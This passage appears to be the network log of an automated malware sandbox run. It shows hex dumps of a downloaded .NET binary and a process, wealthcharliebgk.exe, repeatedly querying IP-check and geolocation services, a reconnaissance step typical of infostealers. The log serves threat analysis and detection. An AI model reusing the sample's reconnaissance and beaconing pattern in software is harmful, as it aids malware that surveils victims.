                                                                                                                                  Nov 19, 2024 18:08:04.159708977 CET1236INData Raw: 16 13 09 11 09 2c 09 11 08 75 20 00 00 01 13 04 00 11 07 6f 5e 00 00 0a 2d b8 de 16 11 07 75 28 00 00 01 13 0a 11 0a 2c 08 11 0a 6f 1b 00 00 0a 00 dc 00 08 6f 3e 00 00 0a 6f 5a 00 00 0a 13 0b 2b 2b 11 0b 6f 5b 00 00 0a 74 26 00 00 01 13 0c 00 11
                                                                                                                                  Data Ascii: ,u o^-u(,oo>oZ++o[t&u ,u +o^-u(,oo_(`o_(`o_rGp(],1+,YXo_rKp(],
                                                                                                                                  Nov 19, 2024 18:08:04.159719944 CET1236INData Raw: 73 39 00 00 0a 7d 4a 00 00 04 02 73 63 00 00 0a 7d 37 00 00 04 02 73 39 00 00 0a 7d 38 00 00 04 02 7b 32 00 00 04 6f 3a 00 00 0a 00 02 7b 36 00 00 04 6f 3a 00 00 0a 00 02 7b 3b 00 00 04 6f 3a 00 00 0a 00 02 7b 40 00 00 04 6f 3a 00 00 0a 00 02 7b
                                                                                                                                  Data Ascii: s9}Jsc}7s9}8{2o:{6o:{;o:{@o:{Do:(:{2o>{3o?{2o>{4o?{2o>{5o?{2ZYs@oA{2rpoB{2PsCoD{2oE{3
                                                                                                                                  Nov 19, 2024 18:08:04.164643049 CET1236INData Raw: 00 02 7b 39 00 00 04 1f 09 20 d1 00 00 00 73 40 00 00 0a 6f 41 00 00 0a 00 02 7b 39 00 00 04 72 6b 04 00 70 6f 42 00 00 0a 00 02 7b 39 00 00 04 1f 26 1f 0d 73 43 00 00 0a 6f 44 00 00 0a 00 02 7b 39 00 00 04 1c 6f 45 00 00 0a 00 02 7b 39 00 00 04
                                                                                                                                  Data Ascii: {9 s@oA{9rkpoB{9&sCoD{9oE{9rpoF{:oL{: s@oA{:rpoB{:=sCoD{:oE{:rpoF{;o>{<o?{;o>{=o?


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  1192.168.2.2249162193.122.130.0803860C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 19, 2024 18:08:10.250392914 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Nov 19, 2024 18:08:10.728616953 CET320INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:10 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 2d50e1ac90e8c4ba632817b5fd14ca0e
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                  Nov 19, 2024 18:08:10.761604071 CET127OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Nov 19, 2024 18:08:10.865844965 CET320INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:10 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 6376f603f7872014620d5661f481cc28
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                  Nov 19, 2024 18:08:11.081865072 CET320INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:10 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 6376f603f7872014620d5661f481cc28
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                  Nov 19, 2024 18:08:12.015062094 CET127OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Nov 19, 2024 18:08:12.118700027 CET320INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:12 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 25782e1ec8e5aae74dcd111928c69b62
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                  Nov 19, 2024 18:08:12.337897062 CET320INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:12 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 25782e1ec8e5aae74dcd111928c69b62
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  2192.168.2.2249165193.122.130.0803860C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 19, 2024 18:08:13.667134047 CET127OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Nov 19, 2024 18:08:14.160260916 CET320INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:14 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 5cf2d86783815a69bbd458cbb7d1964f
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  3192.168.2.2249167158.101.44.242803860C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 19, 2024 18:08:14.873955011 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Nov 19, 2024 18:08:15.450604916 CET320INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:15 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: bebaf233f37d20d32d3e9cd677a303de
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  4192.168.2.2249169132.226.8.169803860C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 19, 2024 18:08:16.157659054 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Nov 19, 2024 18:08:17.776053905 CET272INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:17 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  5192.168.2.2249171132.226.247.73803860C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 19, 2024 18:08:18.816247940 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Nov 19, 2024 18:08:19.480195999 CET320INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:19 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: bc4f74b7afa83fea76e884ed6d151312
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                  Nov 19, 2024 18:08:19.689795017 CET320INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:19 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: bc4f74b7afa83fea76e884ed6d151312
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  6192.168.2.2249173193.122.130.0803860C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 19, 2024 18:08:20.177447081 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Nov 19, 2024 18:08:20.636312008 CET320INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:20 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 9c3ec8b09512c98b8fecaf545f672cbd
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                  Nov 19, 2024 18:08:20.845897913 CET320INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:20 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 9c3ec8b09512c98b8fecaf545f672cbd
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  7192.168.2.2249175193.122.130.0803860C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 19, 2024 18:08:21.330288887 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Nov 19, 2024 18:08:21.808851004 CET320INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:21 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 97803bff483a645c5bbfe17c95f4f17c
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                  Nov 19, 2024 18:08:22.017802000 CET320INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:21 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 97803bff483a645c5bbfe17c95f4f17c
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  8192.168.2.2249177193.122.130.0803860C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 19, 2024 18:08:22.530744076 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Nov 19, 2024 18:08:23.000313997 CET320INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:22 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: d4eed6dfbaf333f264b6ccdf733e9c5e
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                  Nov 19, 2024 18:08:23.205885887 CET320INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:22 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: d4eed6dfbaf333f264b6ccdf733e9c5e
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  0192.168.2.2249163188.114.97.34433860C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-11-19 17:08:11 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-11-19 17:08:11 UTC839INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 361
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: MISS
                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mz61s00Wei8fTPzAVpgO3zH3eoJ%2F6gTzTJTsdWAwQi5L1Db0RgTvgwjsXeKyNuzAQWBuM7HRHKKGmIZA1gRrgWVe%2FaB2kK3gPjKfvmtwhfPxmh8bPTyc6GD3BVoNlU%2BNe2Sk91Zw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8e51cd04388e8c69-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1824&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1553191&cwnd=213&unsent_bytes=0&cid=3a1a9d60ef24617e&ts=583&x=0"
                                                                                                                                  2024-11-19 17:08:11 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  1192.168.2.2249164188.114.97.34433860C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-11-19 17:08:12 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  2024-11-19 17:08:12 UTC850INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:12 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 361
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 1
                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OvABsR0ZUqgCmuTOfFgv03N%2BLd6yQoGiTyDpxrK8LABhW6d64MXlPma%2BRh%2BfPLferuX%2B01wIVgG60HQnU5of4TYqjiatUj2bdDSxqPv17HES%2BPPhxmVdoXKYeHWVzL1NM2PWlRjP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8e51cd0b6c2bc40e-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1778&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1646926&cwnd=173&unsent_bytes=0&cid=866ced8d249b222f&ts=180&x=0"
